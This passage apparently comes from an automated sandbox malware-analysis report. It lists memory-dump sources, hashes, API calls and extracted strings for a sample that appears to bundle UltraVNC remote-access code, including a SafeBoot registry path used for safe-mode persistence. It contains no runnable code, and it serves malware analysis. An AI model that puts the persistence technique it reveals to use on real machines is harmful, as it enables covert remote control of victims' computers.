                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: EnumDisplayDevicesA$USER32
                                                                            • API String ID: 145871493-2970514552
                                                                            • Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                            • Instruction ID: 281d9b0e2ad8a423ccbd478082909f27cb83c0be838b719b4b87d81e11ffc5fc
                                                                            • Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                            • Instruction Fuzzy Hash: 0C217132B08B8282E7A0DF11E4447EA63A5FB8A799F554235DEDD83788DF7DD8058740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SubVersionNumber
                                                                            • API String ID: 3677997916-1834015684
                                                                            • Opcode ID: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                            • Instruction ID: 6618c5ea69e596ba3994517743b29b24e6d9bfc34faeac9aed5ab90c4abfefa4
                                                                            • Opcode Fuzzy Hash: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                            • Instruction Fuzzy Hash: 26214F61A18A8381EBA0CF20E4447AA73A4FB5579DF441136DB8D877A8EFBDD085CB04
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: System\CurrentControlSet\Control\Terminal Server$TSAppCompat
                                                                            • API String ID: 3677997916-252502655
                                                                            • Opcode ID: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
                                                                            • Instruction ID: 25d7e86081c148c0d35551bb1e4db9f04270fcc1f74129a204c938d8b9f3d36a
                                                                            • Opcode Fuzzy Hash: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
                                                                            • Instruction Fuzzy Hash: FF015E71618B8286EB508F21E88476AB764FB8479DF400135EACD86B68EFBCD158CB44
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfileWrite$SectionStringwsprintf
                                                                            • String ID: Permissions$isWritable
                                                                            • API String ID: 4007284473-46173998
                                                                            • Opcode ID: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                            • Instruction ID: 373e268c755e4292a6b7585ec05e39ffa50a14a2f81e733b368c1396a259025c
                                                                            • Opcode Fuzzy Hash: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                            • Instruction Fuzzy Hash: E8014875A08A4792EA908F11E8911B53370FF89B4EF441032DE8DC6354EEACE169C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenValue
                                                                            • String ID: Control Panel\Desktop$WallpaperStyle
                                                                            • API String ID: 779948276-747434185
                                                                            • Opcode ID: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
                                                                            • Instruction ID: 5f4cb30dce472a553b588c8dc207cb1f697f3a8256491a453557044bea3c522d
                                                                            • Opcode Fuzzy Hash: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
                                                                            • Instruction Fuzzy Hash: 78014F75A18A9282DB50CF24F84456A73B0FB857A9F905331EEAD83BE8DF6DD504CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Desktop$WallpaperStyle
                                                                            • API String ID: 3677997916-747434185
                                                                            • Opcode ID: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
                                                                            • Instruction ID: 01a9de4433f1fe84924af46ea115f2dc85fb257f516938abf6a9a545ade9cacb
                                                                            • Opcode Fuzzy Hash: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
                                                                            • Instruction Fuzzy Hash: 2BF0F625A08A5281EA508F14F89466A7774FB8578EF900231DB8D83B68DF6DD159CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Delete_errno_invalid_parameter_noinfo_snprintf
                                                                            • String ID: Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$uvnc_service
                                                                            • API String ID: 1597899911-1199838351
                                                                            • Opcode ID: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                            • Instruction ID: cdf5c17dc7680cfab11f3314c13742272f1551f751563453e44852fcf08fb43f
                                                                            • Opcode Fuzzy Hash: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                            • Instruction Fuzzy Hash: 9AF03065A28A8691EA909F60F4513BA6370FF8431DFC01236EB9D87798DFBCD119C744
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 1050512615-0
                                                                            • Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                            • Instruction ID: 6e7be6d167ad94e5eb4115c80f3b97c77110f6c5910a87c3f47976b3c67cef18
                                                                            • Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                            • Instruction Fuzzy Hash: 0A71B152A0C2D385F7E14E71955017E2BB4AB01B8EF189431EFDD8779ACEACE469CB10
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FlushObjectSelect
                                                                            • String ID:
                                                                            • API String ID: 2071645339-0
                                                                            • Opcode ID: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
                                                                            • Instruction ID: d646a386c5015cba851baca9d16dd3e1acc688bc3c884f1110e0a5cca0c97acb
                                                                            • Opcode Fuzzy Hash: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
                                                                            • Instruction Fuzzy Hash: F8517E729097C19AE7608F25E4443797BA0EB46B8EF180536DEC987765CFBCE484C708
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _lock$_errno_getptd_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2808128820-0
                                                                            • Opcode ID: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
                                                                            • Instruction ID: f59ebba1e43608d1b109421a7ec28babf2e6a1c2ae39f1223075783989d0ad41
                                                                            • Opcode Fuzzy Hash: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
                                                                            • Instruction Fuzzy Hash: 45416B21A0968281FB94AF21A9017FA66B1BF45BCEF504935EF8D87796DFACA501C700
                                                                            APIs
                                                                            • DecodePointer.KERNEL32(?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C37AB1
                                                                            • DecodePointer.KERNEL32(?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C37AC1
                                                                              • Part of subcall function 00007FF6C2C43480: _errno.LIBCMT ref: 00007FF6C2C43489
                                                                              • Part of subcall function 00007FF6C2C43480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C2C43494
                                                                            • EncodePointer.KERNEL32(?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C37B3F
                                                                              • Part of subcall function 00007FF6C2C43370: realloc.LIBCMT ref: 00007FF6C2C4339B
                                                                              • Part of subcall function 00007FF6C2C43370: Sleep.KERNEL32(?,?,00000000,00007FF6C2C37B2F,?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C433B7
                                                                            • EncodePointer.KERNEL32(?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C37B4F
                                                                            • EncodePointer.KERNEL32(?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C37B5C
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                            • String ID:
                                                                            • API String ID: 1909145217-0
                                                                            • Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                            • Instruction ID: 6aba89a991fbb0de48d3e9cd5e830c89b6ce326f36e31552027d9b0a281adb46
                                                                            • Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                            • Instruction Fuzzy Hash: 7D216D21B0A74241EA809F51F9480F963B1BF48BCEF544835DF8D87765EEBCE4A98340
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalDeleteSection$FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3328731263-0
                                                                            • Opcode ID: 8aae7b92523719c6034b62ab641376894423f86d000e2d8d74b437424aa0e4fe
                                                                            • Instruction ID: 13c55606c2d7459e67b315a6c4f1dc28e721a861f250b2787aea511c5047b7fa
                                                                            • Opcode Fuzzy Hash: 8aae7b92523719c6034b62ab641376894423f86d000e2d8d74b437424aa0e4fe
                                                                            • Instruction Fuzzy Hash: 53214425709A82A5DA88DF20D5A02F97370FF45759F440532CBED837A1CFACE164D350
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalEnterSectionclosesocketshutdown
                                                                            • String ID: c$vncclient.cpp : enable update thread$vncclient.cpp : enable/disable synced$vncclient.cpp : protocol enabled too many times!
                                                                            • API String ID: 3339156387-1190838069
                                                                            • Opcode ID: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
                                                                            • Instruction ID: 59a7564b5a547b65e8cc0d9ee86b0d83dd66ebf0a624a3fd0ccbfd533dd91296
                                                                            • Opcode Fuzzy Hash: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
                                                                            • Instruction Fuzzy Hash: 6C212971A18A8282EB50DF25D8402F93365FB89B9DF484232DE9DC73A5DFBCD4058340
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
